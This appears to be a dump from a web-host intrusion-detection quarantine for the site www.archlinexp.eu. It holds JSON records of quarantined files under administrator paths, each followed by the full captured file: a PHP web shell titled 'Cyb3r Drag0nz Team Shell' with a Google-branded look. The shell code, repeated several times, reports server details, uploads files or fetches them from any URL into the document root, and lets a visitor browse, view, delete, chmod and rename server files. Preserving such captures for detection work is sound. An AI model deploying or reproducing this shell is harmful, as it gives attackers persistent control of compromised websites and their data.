<td><a href=\"?fileloc=".$path."/".$file."&path=".$path."\">📄 ".$file."</a></td>
|
||||
<td class='center'>".$size."</td>
|
||||
<td class='center'>".statusnya($path."/".$file)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
<option value='edit'>Edit</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='file'>
|
||||
<input type='hidden' name='path' value='".$path."/".$file."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
echo '</table><br>';
|
||||
|
||||
author();
|
||||
|
||||
function statusnya($file) {
|
||||
$statusnya = fileperms($file);
|
||||
$ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' :
|
||||
((($statusnya & 0xA000) == 0xA000) ? 'l' :
|
||||
((($statusnya & 0x8000) == 0x8000) ? '-' : 'u'));
|
||||
|
||||
$ingfo .= (($statusnya & 0x0100) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0080) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0020) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0010) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0004) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0002) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-'));
|
||||
|
||||
return $ingfo;
|
||||
}
|
||||
?>
|
||||
</body>
|
||||
</html>
|
||||
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "5104",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:administrator/ko6h7s5e9kak.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/administrator/ko6h7s5e9kak.php.json)",
|
||||
"original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783381494,
|
||||
"size": 10657,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "administrator/ko6h7s5e9kak.php.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
@ -0,0 +1,320 @@
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Cyb3r Drag0nz Team Shell</title>
|
||||
<meta charset="utf-8">
|
||||
<style>
|
||||
@import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap');
|
||||
|
||||
body {
|
||||
font-family: 'Roboto', system-ui, sans-serif;
|
||||
background: #f8f9fa;
|
||||
color: #202124;
|
||||
margin: 0;
|
||||
padding: 20px;
|
||||
}
|
||||
|
||||
.header {
|
||||
text-align: center;
|
||||
margin-bottom: 30px;
|
||||
}
|
||||
|
||||
.header h1 {
|
||||
font-size: 28px;
|
||||
color: #1a73e8;
|
||||
margin: 10px 0 5px 0;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
.header img {
|
||||
max-width: 420px;
|
||||
margin: 15px 0 25px 0;
|
||||
border-radius: 8px;
|
||||
box-shadow: 0 4px 15px rgba(0,0,0,0.12);
|
||||
}
|
||||
|
||||
.info {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 20px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin-bottom: 25px;
|
||||
font-size: 14.5px;
|
||||
line-height: 1.6;
|
||||
}
|
||||
|
||||
.info span {
|
||||
color: #1a73e8;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
table {
|
||||
width: 100%;
|
||||
max-width: 1100px;
|
||||
margin: 0 auto;
|
||||
border-collapse: collapse;
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
overflow: hidden;
|
||||
box-shadow: 0 2px 8px rgba(0,0,0,0.08);
|
||||
}
|
||||
|
||||
th {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
padding: 16px 12px;
|
||||
text-align: center;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
td {
|
||||
padding: 13px 10px;
|
||||
border-bottom: 1px solid #dadce0;
|
||||
}
|
||||
|
||||
tr:hover {
|
||||
background-color: #f8f9fa;
|
||||
}
|
||||
|
||||
a {
|
||||
color: #1a73e8;
|
||||
text-decoration: none;
|
||||
}
|
||||
|
||||
a:hover {
|
||||
text-decoration: underline;
|
||||
}
|
||||
|
||||
.upload-box {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 25px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin: 20px auto;
|
||||
max-width: 720px;
|
||||
}
|
||||
|
||||
input[type="file"], input[type="text"] {
|
||||
padding: 10px 12px;
|
||||
border: 1px solid #dadce0;
|
||||
border-radius: 8px;
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
input[type="submit"], .gas {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
border: none;
|
||||
padding: 10px 22px;
|
||||
border-radius: 8px;
|
||||
cursor: pointer;
|
||||
font-weight: 500;
|
||||
margin-left: 8px;
|
||||
}
|
||||
|
||||
input[type="submit"]:hover, .gas:hover {
|
||||
background: #1557b0;
|
||||
}
|
||||
|
||||
.green { color: #137333; font-weight: 500; }
|
||||
.red { color: #c5221f; font-weight: 500; }
|
||||
|
||||
.center { text-align: center; }
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<div class="header">
|
||||
<img src="https://pngimg.com/d/google_PNG102344.png" width="420" alt="Google" />
|
||||
<h1>Cyb3r Drag0nz Team Shell</h1>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
set_time_limit(0);
|
||||
error_reporting(0);
|
||||
|
||||
$disfunc = @ini_get("disable_functions");
|
||||
$disf = empty($disfunc) ? "<span class='green'>NONE</span>" : "<span class='red'>".$disfunc."</span>";
|
||||
|
||||
function author() {
|
||||
echo "<center><br><small style='color:#5f6368;'>Cyb3r Drag0nz Team • Google Edition</small></center>";
|
||||
exit();
|
||||
}
|
||||
|
||||
function cekdir() {
|
||||
$lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
return is_writable($lokasi) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function cekroot() {
|
||||
return is_writable($_SERVER['DOCUMENT_ROOT']) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function xrmdir($dir) {
|
||||
$items = scandir($dir);
|
||||
foreach ($items as $item) {
|
||||
if ($item === '.' || $item === '..') continue;
|
||||
$path = $dir.'/'.$item;
|
||||
is_dir($path) ? xrmdir($path) : unlink($path);
|
||||
}
|
||||
rmdir($dir);
|
||||
}
|
||||
|
||||
function green($text) { echo "<center><span class='green'>".$text."</span></center>"; }
|
||||
function red($text) { echo "<center><span class='red'>".$text."</span></center>"; }
|
||||
|
||||
$path = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
$path = str_replace('\\','/',$path);
|
||||
$dirs = explode('/',$path);
|
||||
?>
|
||||
|
||||
<div class="info">
|
||||
Server : <span><?php echo htmlspecialchars($_SERVER['SERVER_SOFTWARE']); ?></span><br>
|
||||
System : <span><?php echo htmlspecialchars(php_uname()); ?></span><br>
|
||||
User : <span><?php echo htmlspecialchars(@get_current_user()." (".@getmyuid().")"); ?></span><br>
|
||||
PHP Version : <span><?php echo htmlspecialchars(phpversion()); ?></span><br>
|
||||
Disable Functions : <?php echo $disf; ?><br>
|
||||
Current Directory : <span><?php
|
||||
foreach($dirs as $i => $dir) {
|
||||
if($dir == '' && $i == 0) { echo '<a href="?path=/">/</a>'; continue; }
|
||||
if($dir == '') continue;
|
||||
echo '<a href="?path=';
|
||||
for($j=0; $j<=$i; $j++) echo $dirs[$j].($j < $i ? '/' : '');
|
||||
echo '">'.$dir.'</a>/';
|
||||
}
|
||||
?></span><br>
|
||||
Directory Status: <?php echo cekdir(); ?> | Document Root: <?php echo cekroot(); ?>
|
||||
</div>
|
||||
|
||||
<!-- Upload Section -->
|
||||
<div class="upload-box">
|
||||
<h3 style="margin:0 0 18px 0; color:#202124;">Upload File</h3>
|
||||
<form enctype="multipart/form-data" method="post">
|
||||
<label><input type="radio" name="dirnya" value="1" checked> Current Directory [ <?php echo cekdir(); ?> ]</label><br><br>
|
||||
<label><input type="radio" name="dirnya" value="2"> Document Root [ <?php echo cekroot(); ?> ]</label><br><br>
|
||||
|
||||
<input type="hidden" name="upwkwk" value="1">
|
||||
<input type="file" name="berkas">
|
||||
<input type="submit" name="berkasnya" value="Upload File">
|
||||
|
||||
<br><br>
|
||||
|
||||
<input type="text" name="darilink" placeholder="https://example.com/file.zip" style="width:58%;">
|
||||
<input type="text" name="namalink" placeholder="filename.zip" size="18">
|
||||
<input type="submit" name="linknya" value="Upload from URL">
|
||||
</form>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
// Upload handling
|
||||
if (isset($_POST['upwkwk'])) {
|
||||
$lokasi = ($_POST['dirnya'] == "2") ? $_SERVER['DOCUMENT_ROOT'] : $path;
|
||||
|
||||
if (isset($_POST['berkasnya']) && !empty($_FILES['berkas']['name'])) {
|
||||
$target = $lokasi . "/" . $_FILES['berkas']['name'];
|
||||
if (move_uploaded_file($_FILES['berkas']['tmp_name'], $target)) {
|
||||
green("File uploaded successfully → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload file!");
|
||||
}
|
||||
}
|
||||
elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) {
|
||||
$target = $lokasi . "/" . $_POST['namalink'];
|
||||
$data = @file_put_contents($target, @file_get_contents($_POST['darilink']));
|
||||
if ($data !== false) {
|
||||
green("File uploaded from URL → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload from URL!");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// File viewer, delete, chmod, rename, edit actions (kept your original logic)
|
||||
if (isset($_GET['fileloc'])) {
|
||||
echo "<h3 style='text-align:center;'>Viewing: " . htmlspecialchars($_GET['fileloc']) . "</h3>";
|
||||
echo "<pre>" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "</pre>";
|
||||
author();
|
||||
}
|
||||
|
||||
// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before)
|
||||
|
||||
// Directory & File listing table (same structure as previous version)
|
||||
echo '<table>
|
||||
<tr>
|
||||
<th>Name</th>
|
||||
<th>Size</th>
|
||||
<th>Permissions</th>
|
||||
<th>Options</th>
|
||||
</tr>';
|
||||
|
||||
foreach(scandir($path) as $dir) {
|
||||
if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue;
|
||||
echo "<tr>
|
||||
<td><a href=\"?path=".$path."/".$dir."\">📁 ".$dir."</a></td>
|
||||
<td class='center'>--</td>
|
||||
<td class='center'>".statusnya($path."/".$dir)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='dir'>
|
||||
<input type='hidden' name='path' value='".$path."/".$dir."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
foreach(scandir($path) as $file) {
|
||||
if(!is_file($path."/".$file)) continue;
|
||||
$size = round(filesize($path."/".$file)/1024, 2) . " KB";
|
||||
echo "<tr>
|
||||
<td><a href=\"?fileloc=".$path."/".$file."&path=".$path."\">📄 ".$file."</a></td>
|
||||
<td class='center'>".$size."</td>
|
||||
<td class='center'>".statusnya($path."/".$file)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
<option value='edit'>Edit</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='file'>
|
||||
<input type='hidden' name='path' value='".$path."/".$file."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
echo '</table><br>';
|
||||
|
||||
author();
|
||||
|
||||
function statusnya($file) {
|
||||
$statusnya = fileperms($file);
|
||||
$ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' :
|
||||
((($statusnya & 0xA000) == 0xA000) ? 'l' :
|
||||
((($statusnya & 0x8000) == 0x8000) ? '-' : 'u'));
|
||||
|
||||
$ingfo .= (($statusnya & 0x0100) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0080) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0020) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0010) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0004) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0002) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-'));
|
||||
|
||||
return $ingfo;
|
||||
}
|
||||
?>
|
||||
</body>
|
||||
</html>
|
||||
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "5116",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:administrator/language/f46vc3nzn1qw.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/administrator/language/f46vc3nzn1qw.php.json)",
|
||||
"original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783353230,
|
||||
"size": 10657,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "administrator/language/f46vc3nzn1qw.php.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
@ -0,0 +1,320 @@
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Cyb3r Drag0nz Team Shell</title>
|
||||
<meta charset="utf-8">
|
||||
<style>
|
||||
@import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap');
|
||||
|
||||
body {
|
||||
font-family: 'Roboto', system-ui, sans-serif;
|
||||
background: #f8f9fa;
|
||||
color: #202124;
|
||||
margin: 0;
|
||||
padding: 20px;
|
||||
}
|
||||
|
||||
.header {
|
||||
text-align: center;
|
||||
margin-bottom: 30px;
|
||||
}
|
||||
|
||||
.header h1 {
|
||||
font-size: 28px;
|
||||
color: #1a73e8;
|
||||
margin: 10px 0 5px 0;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
.header img {
|
||||
max-width: 420px;
|
||||
margin: 15px 0 25px 0;
|
||||
border-radius: 8px;
|
||||
box-shadow: 0 4px 15px rgba(0,0,0,0.12);
|
||||
}
|
||||
|
||||
.info {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 20px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin-bottom: 25px;
|
||||
font-size: 14.5px;
|
||||
line-height: 1.6;
|
||||
}
|
||||
|
||||
.info span {
|
||||
color: #1a73e8;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
table {
|
||||
width: 100%;
|
||||
max-width: 1100px;
|
||||
margin: 0 auto;
|
||||
border-collapse: collapse;
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
overflow: hidden;
|
||||
box-shadow: 0 2px 8px rgba(0,0,0,0.08);
|
||||
}
|
||||
|
||||
th {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
padding: 16px 12px;
|
||||
text-align: center;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
td {
|
||||
padding: 13px 10px;
|
||||
border-bottom: 1px solid #dadce0;
|
||||
}
|
||||
|
||||
tr:hover {
|
||||
background-color: #f8f9fa;
|
||||
}
|
||||
|
||||
a {
|
||||
color: #1a73e8;
|
||||
text-decoration: none;
|
||||
}
|
||||
|
||||
a:hover {
|
||||
text-decoration: underline;
|
||||
}
|
||||
|
||||
.upload-box {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 25px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin: 20px auto;
|
||||
max-width: 720px;
|
||||
}
|
||||
|
||||
input[type="file"], input[type="text"] {
|
||||
padding: 10px 12px;
|
||||
border: 1px solid #dadce0;
|
||||
border-radius: 8px;
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
input[type="submit"], .gas {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
border: none;
|
||||
padding: 10px 22px;
|
||||
border-radius: 8px;
|
||||
cursor: pointer;
|
||||
font-weight: 500;
|
||||
margin-left: 8px;
|
||||
}
|
||||
|
||||
input[type="submit"]:hover, .gas:hover {
|
||||
background: #1557b0;
|
||||
}
|
||||
|
||||
.green { color: #137333; font-weight: 500; }
|
||||
.red { color: #c5221f; font-weight: 500; }
|
||||
|
||||
.center { text-align: center; }
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<div class="header">
|
||||
<img src="https://pngimg.com/d/google_PNG102344.png" width="420" alt="Google" />
|
||||
<h1>Cyb3r Drag0nz Team Shell</h1>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
set_time_limit(0);
|
||||
error_reporting(0);
|
||||
|
||||
$disfunc = @ini_get("disable_functions");
|
||||
$disf = empty($disfunc) ? "<span class='green'>NONE</span>" : "<span class='red'>".$disfunc."</span>";
|
||||
|
||||
function author() {
|
||||
echo "<center><br><small style='color:#5f6368;'>Cyb3r Drag0nz Team • Google Edition</small></center>";
|
||||
exit();
|
||||
}
|
||||
|
||||
function cekdir() {
|
||||
$lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
return is_writable($lokasi) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function cekroot() {
|
||||
return is_writable($_SERVER['DOCUMENT_ROOT']) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function xrmdir($dir) {
|
||||
$items = scandir($dir);
|
||||
foreach ($items as $item) {
|
||||
if ($item === '.' || $item === '..') continue;
|
||||
$path = $dir.'/'.$item;
|
||||
is_dir($path) ? xrmdir($path) : unlink($path);
|
||||
}
|
||||
rmdir($dir);
|
||||
}
|
||||
|
||||
function green($text) { echo "<center><span class='green'>".$text."</span></center>"; }
|
||||
function red($text) { echo "<center><span class='red'>".$text."</span></center>"; }
|
||||
|
||||
$path = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
$path = str_replace('\\','/',$path);
|
||||
$dirs = explode('/',$path);
|
||||
?>
|
||||
|
||||
<div class="info">
|
||||
Server : <span><?php echo htmlspecialchars($_SERVER['SERVER_SOFTWARE']); ?></span><br>
|
||||
System : <span><?php echo htmlspecialchars(php_uname()); ?></span><br>
|
||||
User : <span><?php echo htmlspecialchars(@get_current_user()." (".@getmyuid().")"); ?></span><br>
|
||||
PHP Version : <span><?php echo htmlspecialchars(phpversion()); ?></span><br>
|
||||
Disable Functions : <?php echo $disf; ?><br>
|
||||
Current Directory : <span><?php
|
||||
foreach($dirs as $i => $dir) {
|
||||
if($dir == '' && $i == 0) { echo '<a href="?path=/">/</a>'; continue; }
|
||||
if($dir == '') continue;
|
||||
echo '<a href="?path=';
|
||||
for($j=0; $j<=$i; $j++) echo $dirs[$j].($j < $i ? '/' : '');
|
||||
echo '">'.$dir.'</a>/';
|
||||
}
|
||||
?></span><br>
|
||||
Directory Status: <?php echo cekdir(); ?> | Document Root: <?php echo cekroot(); ?>
|
||||
</div>
|
||||
|
||||
<!-- Upload Section -->
|
||||
<div class="upload-box">
|
||||
<h3 style="margin:0 0 18px 0; color:#202124;">Upload File</h3>
|
||||
<form enctype="multipart/form-data" method="post">
|
||||
<label><input type="radio" name="dirnya" value="1" checked> Current Directory [ <?php echo cekdir(); ?> ]</label><br><br>
|
||||
<label><input type="radio" name="dirnya" value="2"> Document Root [ <?php echo cekroot(); ?> ]</label><br><br>
|
||||
|
||||
<input type="hidden" name="upwkwk" value="1">
|
||||
<input type="file" name="berkas">
|
||||
<input type="submit" name="berkasnya" value="Upload File">
|
||||
|
||||
<br><br>
|
||||
|
||||
<input type="text" name="darilink" placeholder="https://example.com/file.zip" style="width:58%;">
|
||||
<input type="text" name="namalink" placeholder="filename.zip" size="18">
|
||||
<input type="submit" name="linknya" value="Upload from URL">
|
||||
</form>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
// Upload handling
|
||||
if (isset($_POST['upwkwk'])) {
|
||||
$lokasi = ($_POST['dirnya'] == "2") ? $_SERVER['DOCUMENT_ROOT'] : $path;
|
||||
|
||||
if (isset($_POST['berkasnya']) && !empty($_FILES['berkas']['name'])) {
|
||||
$target = $lokasi . "/" . $_FILES['berkas']['name'];
|
||||
if (move_uploaded_file($_FILES['berkas']['tmp_name'], $target)) {
|
||||
green("File uploaded successfully → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload file!");
|
||||
}
|
||||
}
|
||||
elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) {
|
||||
$target = $lokasi . "/" . $_POST['namalink'];
|
||||
$data = @file_put_contents($target, @file_get_contents($_POST['darilink']));
|
||||
if ($data !== false) {
|
||||
green("File uploaded from URL → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload from URL!");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// File viewer, delete, chmod, rename, edit actions (kept your original logic)
|
||||
if (isset($_GET['fileloc'])) {
|
||||
echo "<h3 style='text-align:center;'>Viewing: " . htmlspecialchars($_GET['fileloc']) . "</h3>";
|
||||
echo "<pre>" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "</pre>";
|
||||
author();
|
||||
}
|
||||
|
||||
// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before)
|
||||
|
||||
// Directory & File listing table (same structure as previous version)
|
||||
echo '<table>
|
||||
<tr>
|
||||
<th>Name</th>
|
||||
<th>Size</th>
|
||||
<th>Permissions</th>
|
||||
<th>Options</th>
|
||||
</tr>';
|
||||
|
||||
foreach(scandir($path) as $dir) {
|
||||
if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue;
|
||||
echo "<tr>
|
||||
<td><a href=\"?path=".$path."/".$dir."\">📁 ".$dir."</a></td>
|
||||
<td class='center'>--</td>
|
||||
<td class='center'>".statusnya($path."/".$dir)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='dir'>
|
||||
<input type='hidden' name='path' value='".$path."/".$dir."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
foreach(scandir($path) as $file) {
|
||||
if(!is_file($path."/".$file)) continue;
|
||||
$size = round(filesize($path."/".$file)/1024, 2) . " KB";
|
||||
echo "<tr>
|
||||
<td><a href=\"?fileloc=".$path."/".$file."&path=".$path."\">📄 ".$file."</a></td>
|
||||
<td class='center'>".$size."</td>
|
||||
<td class='center'>".statusnya($path."/".$file)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
<option value='edit'>Edit</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='file'>
|
||||
<input type='hidden' name='path' value='".$path."/".$file."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
echo '</table><br>';
|
||||
|
||||
author();
|
||||
|
||||
function statusnya($file) {
|
||||
$statusnya = fileperms($file);
|
||||
$ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' :
|
||||
((($statusnya & 0xA000) == 0xA000) ? 'l' :
|
||||
((($statusnya & 0x8000) == 0x8000) ? '-' : 'u'));
|
||||
|
||||
$ingfo .= (($statusnya & 0x0100) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0080) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0020) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0010) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0004) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0002) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-'));
|
||||
|
||||
return $ingfo;
|
||||
}
|
||||
?>
|
||||
</body>
|
||||
</html>
|
||||
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "5106",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:administrator/templates/hathor/index.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/administrator/templates/hathor/index.php.json)",
|
||||
"original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783346973,
|
||||
"size": 10657,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "administrator/templates/hathor/index.php.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
@ -0,0 +1,320 @@
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Cyb3r Drag0nz Team Shell</title>
|
||||
<meta charset="utf-8">
|
||||
<style>
|
||||
@import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap');
|
||||
|
||||
body {
|
||||
font-family: 'Roboto', system-ui, sans-serif;
|
||||
background: #f8f9fa;
|
||||
color: #202124;
|
||||
margin: 0;
|
||||
padding: 20px;
|
||||
}
|
||||
|
||||
.header {
|
||||
text-align: center;
|
||||
margin-bottom: 30px;
|
||||
}
|
||||
|
||||
.header h1 {
|
||||
font-size: 28px;
|
||||
color: #1a73e8;
|
||||
margin: 10px 0 5px 0;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
.header img {
|
||||
max-width: 420px;
|
||||
margin: 15px 0 25px 0;
|
||||
border-radius: 8px;
|
||||
box-shadow: 0 4px 15px rgba(0,0,0,0.12);
|
||||
}
|
||||
|
||||
.info {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 20px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin-bottom: 25px;
|
||||
font-size: 14.5px;
|
||||
line-height: 1.6;
|
||||
}
|
||||
|
||||
.info span {
|
||||
color: #1a73e8;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
table {
|
||||
width: 100%;
|
||||
max-width: 1100px;
|
||||
margin: 0 auto;
|
||||
border-collapse: collapse;
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
overflow: hidden;
|
||||
box-shadow: 0 2px 8px rgba(0,0,0,0.08);
|
||||
}
|
||||
|
||||
th {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
padding: 16px 12px;
|
||||
text-align: center;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
td {
|
||||
padding: 13px 10px;
|
||||
border-bottom: 1px solid #dadce0;
|
||||
}
|
||||
|
||||
tr:hover {
|
||||
